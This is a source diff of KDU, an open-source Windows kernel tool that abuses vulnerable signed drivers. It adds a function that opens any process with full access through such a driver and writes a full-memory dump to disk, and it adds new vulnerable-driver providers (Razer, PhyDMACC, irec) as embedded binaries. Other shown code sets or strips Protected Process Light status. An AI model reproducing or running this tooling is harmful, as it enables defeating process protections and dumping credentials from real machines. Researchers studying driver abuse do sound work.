* Processes DKOM related routines.
*
@@ -18,6 +18,16 @@
*******************************************************************************/
#include "global.h"
+#include
+
+typedef BOOL (WINAPI *pfnMiniDumpWriteDump)(
+ _In_ HANDLE hProcess,
+ _In_ DWORD ProcessId,
+ _In_ HANDLE hFile,
+ _In_ MINIDUMP_TYPE DumpType,
+ _In_opt_ PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
+ _In_opt_ PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
+ _In_opt_ PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
LPSTR KDUGetProtectionTypeAsString(
_In_ ULONG Type
@@ -87,7 +97,110 @@ LPSTR KDUGetProtectionSignerAsString(
}
/*
-* KDUControlProcess
+* KDUDumpProcessMemory
+*
+* Purpose:
+*
+* Dump process memory.
+*
+*/
+BOOL KDUDumpProcessMemory(
+ _In_ PKDU_CONTEXT Context,
+ _In_ HANDLE ProcessId
+)
+{
+ BOOL bResult = FALSE;
+ HMODULE dbgModule;
+ HANDLE hFile = INVALID_HANDLE_VALUE;
+ HANDLE processHandle = NULL;
+ pfnMiniDumpWriteDump pMiniDumpWriteDump;
+
+ WCHAR szOutputName[MAX_PATH];
+ union {
+ PSYSTEM_PROCESS_INFORMATION Process;
+ PBYTE ListRef;
+ } List;
+
+ PSYSTEM_PROCESS_INFORMATION procEntry = NULL;
+ PVOID procBuffer = supGetSystemInfo(SystemProcessInformation);
+
+ do {
+
+ List.ListRef = (PBYTE)procBuffer;
+ if (List.ListRef == NULL) {
+ supPrintfEvent(kduEventError, "Cannot allocate process list\r\n");
+ break;
+ }
+
+ if (!ntsupQueryProcessEntryById(ProcessId, List.ListRef, &procEntry)) {
+
+ supPrintfEvent(kduEventError,
+ "The %lX process doesn't exist in process list\r\n",
+ HandleToUlong(ProcessId));
+
+ break;
+ }
+
+ supPrintfEvent(kduEventInformation, "[+] Dumping memory of the process 0x%lX (%wZ)\r\n",
+ HandleToUlong(ProcessId), procEntry->ImageName);
+
+ dbgModule = LoadLibraryEx(L"dbghelp.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
+ if (dbgModule == NULL) {
+ supShowWin32Error("[!] Cannot load dbghelp.dll", GetLastError());
+ break;
+ }
+
+ pMiniDumpWriteDump = (pfnMiniDumpWriteDump)GetProcAddress(dbgModule, "MiniDumpWriteDump");
+ if (pMiniDumpWriteDump == NULL) {
+ supShowWin32Error("[!] Dump function is not found", GetLastError());
+ break;
+ }
+
+ bResult = KDUOpenProcess(Context, ProcessId, PROCESS_ALL_ACCESS, &processHandle);
+ if (!bResult || processHandle == NULL) {
+ supShowWin32Error("[!] Cannot open process", GetLastError());
+ break;
+ }
+
+ StringCchPrintf(szOutputName,
+ RTL_NUMBER_OF(szOutputName),
+ TEXT("vmem_pid_%lX.dmp"),
+ HandleToUlong(ProcessId));
+
+ hFile = CreateFile(szOutputName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
+ if (hFile == INVALID_HANDLE_VALUE) {
+ supShowWin32Error("[!] Cannot write memory dump", GetLastError());
+ break;
+ }
+
+ bResult = pMiniDumpWriteDump(processHandle,
+ 0,
+ hFile,
+ MiniDumpWithFullMemory,
+ NULL,
+ NULL,
+ NULL);
+
+ if (bResult) {
+ supPrintfEvent(kduEventInformation, "[+] Process memory dumped to %ws\r\n", szOutputName);
+ }
+ else {
+ supShowWin32Error("[!] Cannot dump process", GetLastError());
+ }
+
+ } while (FALSE);
+
+ if (procBuffer) supHeapFree(procBuffer);
+ if (processHandle) NtClose(processHandle);
+
+ if (hFile != INVALID_HANDLE_VALUE)
+ CloseHandle(hFile);
+
+ return bResult;
+}
+
+/*
+* KDURunCommandPPL
*
* Purpose:
*
@@ -123,14 +236,14 @@ BOOL KDURunCommandPPL(
&si, // Pointer to STARTUPINFO structure
&pi); // Pointer to PROCESS_INFORMATION structure
if (!bResult) {
- printf("[!] Failed to create process: 0x%lX\n", GetLastError());
+ supShowWin32Error("[!] Failed to create process", GetLastError());
return bResult;
}
printf_s("[+] Created Process with PID %lu\r\n", pi.dwProcessId);
bResult = KDUControlProcess(Context, pi.dwProcessId, PsProtectedSignerAntimalware, PsProtectedTypeProtectedLight);
if (!bResult) {
- printf_s("[!] Failed to set process as PPL: 0x%lX\n", GetLastError());
+ supShowWin32Error("[!] Failed to set process as PPL", GetLastError());
return bResult;
}
@@ -151,7 +264,7 @@ BOOL KDURunCommandPPL(
}
/*
-* KDUControlProcess
+* KDUUnprotectProcess
*
* Purpose:
*
@@ -203,9 +316,9 @@ BOOL KDUControlProcess(
if (NT_SUCCESS(ntStatus)) {
printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
- supQueryObjectFromHandle(hProcess, &ProcessObject);
+ bResult = supQueryObjectFromHandle(hProcess, &ProcessObject);
- if (ProcessObject != 0) {
+ if (bResult && (ProcessObject != 0)) {
printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);
diff --git a/Source/Hamakaze/ps.h b/Source/Hamakaze/ps.h
index 2ed456a..80d15bf 100644
--- a/Source/Hamakaze/ps.h
+++ b/Source/Hamakaze/ps.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2022
+* (C) COPYRIGHT AUTHORS, 2018 - 2023
*
* TITLE: PS.H
*
-* VERSION: 1.28
+* VERSION: 1.40
*
-* DATE: 01 Dec 2022
+* DATE: 20 Oct 2023
*
* Processes support prototypes and definitions.
*
@@ -38,6 +38,10 @@ BOOL KDURunCommandPPL(
_In_ PKDU_CONTEXT Context,
_In_ LPWSTR CommandLine);
+BOOL KDUDumpProcessMemory(
+ _In_ PKDU_CONTEXT Context,
+ _In_ HANDLE ProcessId);
+
BOOL KDUControlProcess(
_In_ PKDU_CONTEXT Context,
_In_ ULONG_PTR ProcessId,
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 3c423e5..fb862f3 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index 57239ba..02c005f 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index b6cf89d..e134c7e 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,3,4,2309
- PRODUCTVERSION 1,3,4,2309
+ FILEVERSION 1,4,0,2310
+ PRODUCTVERSION 1,4,0,2310
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.3.4.2309"
+ VALUE "FileVersion", "1.4.0.2310"
VALUE "InternalName", "Hamakaze.exe"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.3.4.2309"
+ VALUE "ProductVersion", "1.4.0.2310"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index c86f145..ebb9f76 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -4,9 +4,9 @@
*
* TITLE: TESTS.CPP
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* KDU tests.
*
@@ -188,7 +188,7 @@ VOID KDUTest()
// KDUTestLoad();
// TestSymbols();
- Context = KDUProviderCreate(40,
+ Context = KDUProviderCreate(42,
FALSE,
NT_WIN10_20H1,
KDU_SHELLCODE_V1,
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index b22befb..76e8114 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.34
+* VERSION: 1.40
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* Global consts.
*
@@ -20,16 +20,17 @@
#pragma once
#define KDU_VERSION_MAJOR 1
-#define KDU_VERSION_MINOR 3
-#define KDU_VERSION_REVISION 4
-#define KDU_VERSION_BUILD 2309
+#define KDU_VERSION_MINOR 4
+#define KDU_VERSION_REVISION 0
+#define KDU_VERSION_BUILD 2310
+#define KDU_COPYRIGHT_YEAR 2023
#define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1
#define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined
#define IPC_GET_HANDLE 0x1337
-#define KDU_SYNC_MUTANT 0x2309
+#define KDU_SYNC_MUTANT 0x2310
#define NT_REG_PREP L"\\Registry\\Machine"
#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
@@ -63,15 +64,15 @@
#define PROVIDER_RES_KEY 0xF62E6CE0
-#define SYSTEM_PID_MAGIC 4
+#define SYSTEM_PID_MAGIC 4
-#define TEXT_SECTION ".text"
-#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
+#define TEXT_SECTION ".text"
+#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
-#define SHELLCODE_SMALL 0x200
+#define SHELLCODE_SMALL 0x200
#ifndef MAX_CLASS_NAME_LEN
-#define MAX_CLASS_NAME_LEN 256
+#define MAX_CLASS_NAME_LEN 256
#endif
//
@@ -103,6 +104,7 @@
#define IDR_PROCEXP1627 2000
#define IDR_PROCEXP1702 2001
#define IDR_INTEL_NAL 103
+#define IDR_RZPNK 104
#define IDR_RTCORE64 105
#define IDR_GDRV 106
#define IDR_ATSZIO64 107
@@ -140,9 +142,10 @@
#define IDR_KEXPLORE 139
#define IDR_KOBJEXP 140
#define IDR_KREGEXP 141
-#define IDR_RESERVED8 142
+#define IDR_PHYDMACC 142
#define IDR_ECHODRV 143
#define IDR_NVOCLOCK 144
+#define IDR_IREC 145
//
// Vulnerable drivers providers id
@@ -188,6 +191,9 @@
#define KDU_PROVIDER_KREGEXP 38
#define KDU_PROVIDER_ECHODRV 39
#define KDU_PROVIDER_NVOCLOCK 40
+#define KDU_PROVIDER_BINALYZE_IREC 41
+#define KDU_PROVIDER_PHYDMACC 42
+#define KDU_PROVIDER_RAZER 43
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
@@ -258,6 +264,11 @@
//
#define KDUPROV_FLAGS_USE_SYMBOLS 0x00000800
+//
+// Provider can be used to open a handle for the specified process.
+//
+#define KDUPROV_FLAGS_OPENPROCESS_SUPPORTED 0x00001000
+
//
// KDU shellcode support flags
//
diff --git a/Source/Shared/kdubase.h b/Source/Shared/kdubase.h
index 84b8639..be1e2cb 100644
--- a/Source/Shared/kdubase.h
+++ b/Source/Shared/kdubase.h
@@ -53,7 +53,8 @@ typedef struct _KDU_DB_ENTRY {
ULONG PreferVirtual : 1;
ULONG CompanionRequired : 1;
ULONG UseSymbols : 1;
- ULONG Reserved : 20;
+ ULONG OpenProcessSupported : 1;
+ ULONG Reserved : 19;
};
};
ULONG SupportedShellFlags;
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index 9573dc3..070a6d1 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -207,6 +207,7 @@
+
@@ -218,6 +219,7 @@
+
@@ -225,6 +227,7 @@
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index 3499161..37d150d 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -181,6 +181,15 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/AsusCertService.bin b/Source/Tanikaze/data/AsusCertService.bin
index befd303..bf3b089 100644
Binary files a/Source/Tanikaze/data/AsusCertService.bin and b/Source/Tanikaze/data/AsusCertService.bin differ
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index aa1b6b9..ae8f343 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index 1880358..4f5a599 100644
--- a/Source/Tanikaze/data/KMUSIG.bin
+++ b/Source/Tanikaze/data/KMUSIG.bin
@@ -1,2 +1,2 @@
-°€°7ïq‡åù��°zæÃ�,]ãqq«>Vf[æÒ&S–>§˜oœƒÖ°ÝükFzQ šÊy,°-Ò·}eÎI8×ôq^gÉ��0¤”^ Áû���r�*œ(®ò™aÃ7p}‡?š4FjB\0K$1g^퉄”�Œ¸b�ÿÓïV`Í´�µý%뇱Þ7—*óÙ�Ö¯�>ôÌwi��á
+°€°7ï-Vf[æÒ&S–>§˜oœƒÖ°ÝükFzQ šÊy,°-Ò·}eÎI8×ôq^gÉ��0¤”^ Áû���r�*œ(®ò™aÃ7p}‡?š4FjB\0K$1g^퉄”�Œ¸b�ÿÓïV`Í´�µý%뇱Þ7—*óÙ�Ö¯�>ôÌwi��á
m�V?‰SHèæ/Œ0��£8”ÎHˆ
]àì
\ No newline at end of file
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index 3e1c88f..a77585d 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index 056bceb..bf8e745 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index 1f5e5c4..417f423 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin
index f908e0e..f6d4c82 100644
Binary files a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin and b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index ee80e84..d72e2e9 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index 53c79b6..55979ab 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index e5854b7..d8e1e48 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index 3f988c3..9a3e8b1 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index 9f63526..bfa61d7 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index 1ce9085..b101ea3 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 8a0c497..b816db1 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index 28f6a2d..6abbfa7 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index ca6d069..e2605fb 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index 87640d4..2ef2c37 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/KExplore.bin b/Source/Tanikaze/drv/KExplore.bin
index 1d5a905..2c28ad6 100644
Binary files a/Source/Tanikaze/drv/KExplore.bin and b/Source/Tanikaze/drv/KExplore.bin differ
diff --git a/Source/Tanikaze/drv/KObjExp.bin b/Source/Tanikaze/drv/KObjExp.bin
index b8a00b2..34c0979 100644
Binary files a/Source/Tanikaze/drv/KObjExp.bin and b/Source/Tanikaze/drv/KObjExp.bin differ
diff --git a/Source/Tanikaze/drv/KRegExp.bin b/Source/Tanikaze/drv/KRegExp.bin
index 669a732..edf5c4c 100644
Binary files a/Source/Tanikaze/drv/KRegExp.bin and b/Source/Tanikaze/drv/KRegExp.bin differ
diff --git a/Source/Tanikaze/drv/LDD.bin b/Source/Tanikaze/drv/LDD.bin
index c8119da..66b3f3c 100644
Binary files a/Source/Tanikaze/drv/LDD.bin and b/Source/Tanikaze/drv/LDD.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index f10f888..c2093ae 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/PhyDMACC.bin b/Source/Tanikaze/drv/PhyDMACC.bin
new file mode 100644
index 0000000..cb58ce6
Binary files /dev/null and b/Source/Tanikaze/drv/PhyDMACC.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index 9f138ff..ea4e5d9 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 051cbe0..5230d68 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index 39a7857..54814f4 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index f5a5090..978ddf5 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 2e849bb..a9d7d0e 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index 1273ef2..a13ca24 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index fb94740..635d538 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 7a79e3c..4cd2723 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/echo_driver.bin b/Source/Tanikaze/drv/echo_driver.bin
index 08dbebc..2177f3a 100644
Binary files a/Source/Tanikaze/drv/echo_driver.bin and b/Source/Tanikaze/drv/echo_driver.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 6a1a061..869c83e 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/etdsupp.bin b/Source/Tanikaze/drv/etdsupp.bin
index 3e86758..5a998fc 100644
Binary files a/Source/Tanikaze/drv/etdsupp.bin and b/Source/Tanikaze/drv/etdsupp.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index 7ee327f..ee17a80 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index 6f16167..3d29c72 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/heavenluo.bin b/Source/Tanikaze/drv/heavenluo.bin
index bb62660..1549cac 100644
Binary files a/Source/Tanikaze/drv/heavenluo.bin and b/Source/Tanikaze/drv/heavenluo.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index ea6d24e..ecd7740 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index 94dd1ec..046e157 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/irec.bin b/Source/Tanikaze/drv/irec.bin
new file mode 100644
index 0000000..855b7da
Binary files /dev/null and b/Source/Tanikaze/drv/irec.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index a317516..662ca8e 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index 9c41f30..d23c417 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index c81e5f3..d2308f3 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/nvoclock.bin b/Source/Tanikaze/drv/nvoclock.bin
index cf977b0..bc7076f 100644
Binary files a/Source/Tanikaze/drv/nvoclock.bin and b/Source/Tanikaze/drv/nvoclock.bin differ
diff --git a/Source/Tanikaze/drv/pcdsrvc_x64.bin b/Source/Tanikaze/drv/pcdsrvc_x64.bin
index 57cdc86..b7e78b4 100644
Binary files a/Source/Tanikaze/drv/pcdsrvc_x64.bin and b/Source/Tanikaze/drv/pcdsrvc_x64.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
index d9fc103..330fae9 100644
Binary files a/Source/Tanikaze/drv/physmem.bin and b/Source/Tanikaze/drv/physmem.bin differ
diff --git a/Source/Tanikaze/drv/procexp1627.bin b/Source/Tanikaze/drv/procexp1627.bin
index 0d10956..5e3df8c 100644
Binary files a/Source/Tanikaze/drv/procexp1627.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
index c030bd6..742815e 100644
Binary files a/Source/Tanikaze/drv/procexp1702.bin and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index 28fb4b3..add34f4 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/drv/rzpnk.bin b/Source/Tanikaze/drv/rzpnk.bin
new file mode 100644
index 0000000..29d8485
Binary files /dev/null and b/Source/Tanikaze/drv/rzpnk.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index 3901d78..cc5ea45 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -3,6 +3,7 @@
// Used by resource.rc
//
#define IDR_INTEL_NAL 103
+#define IDR_RZPNK 104
#define IDR_RTCORE64 105
#define IDR_GDRV 106
#define IDR_ATSZIO64 107
@@ -40,8 +41,10 @@
#define IDR_KEXPLORE 139
#define IDR_KOBJEXP 140
#define IDR_KREGEXP 141
+#define IDR_PHYDMACC 142
#define IDR_ECHODRV 143
#define IDR_NVOCLOCK 144
+#define IDR_IREC 145
#define IDR_DATA_DBUTILCAT 1000
#define IDR_DATA_DBUTILINF 1001
#define IDR_DATA_KMUEXE 1002
@@ -54,7 +57,7 @@
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 145
+#define _APS_NEXT_RESOURCE_VALUE 147
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1007
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 9841f95..b322bad 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -144,6 +144,12 @@ IDR_ECHODRV RCDATA "drv\\echo_driver.bin"
IDR_NVOCLOCK RCDATA "drv\\nvoclock.bin"
+IDR_IREC RCDATA "drv\\irec.bin"
+
+IDR_PHYDMACC RCDATA "drv\\PhyDMACC.bin"
+
+IDR_RZPNK RCDATA "drv\\rzpnk.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -151,8 +157,8 @@ IDR_NVOCLOCK RCDATA "drv\\nvoclock.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,7,2309
- PRODUCTVERSION 1,1,7,2309
+ FILEVERSION 1,1,8,2310
+ PRODUCTVERSION 1,1,8,2310
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -169,12 +175,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.1.7.2309"
+ VALUE "FileVersion", "1.1.8.2310"
VALUE "InternalName", "Tanikaze.dll"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.7.2309"
+ VALUE "ProductVersion", "1.1.8.2310"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index 1ecc07c..6305e51 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.17
+* VERSION: 1.18
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -302,7 +302,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_KPH,
KDU_VICTIM_DEFAULT,
SourceBaseNone,
- KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"KProcessHacker",
(LPWSTR)L"KProcessHacker",
@@ -317,7 +317,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_PROCEXP,
KDU_VICTIM_PE1627,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_VICTIM,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)PROCEXP1627_DESC,
(LPWSTR)PROCEXP152,
